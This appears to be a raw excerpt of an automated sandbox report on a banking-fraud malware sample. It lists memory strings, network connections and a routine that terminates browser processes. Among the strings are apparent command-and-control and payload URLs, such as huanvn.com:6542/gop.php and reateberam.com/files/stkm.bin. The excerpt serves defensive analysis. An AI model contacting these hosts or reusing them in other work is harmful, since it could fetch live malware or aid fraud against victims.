Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lew
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000000.2321862445.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4544441283.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000000.2321008105.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4540619614.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3095470555.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3857371736.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/.5
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3405117-2476756634-1003
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/Z#q
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/eo
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/m
Source: explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4538744172.00000000031FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/E
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/N#e
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/a
Source: explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/ys
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/uo
Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/P
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/Q
Source: rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/~C
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php5
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php6)
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpK
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpn)?
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.php
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.binSL
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bino
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/p
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/q
Source: explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54
Source: explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19
Source: explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4560
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4560D
Source: explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/X
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/t60G
Source: explorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/w
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/
Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/%
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/W
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.php
Source: rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpo
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpu
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907

Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		8_2_0E454948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		8_2_0E454948

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

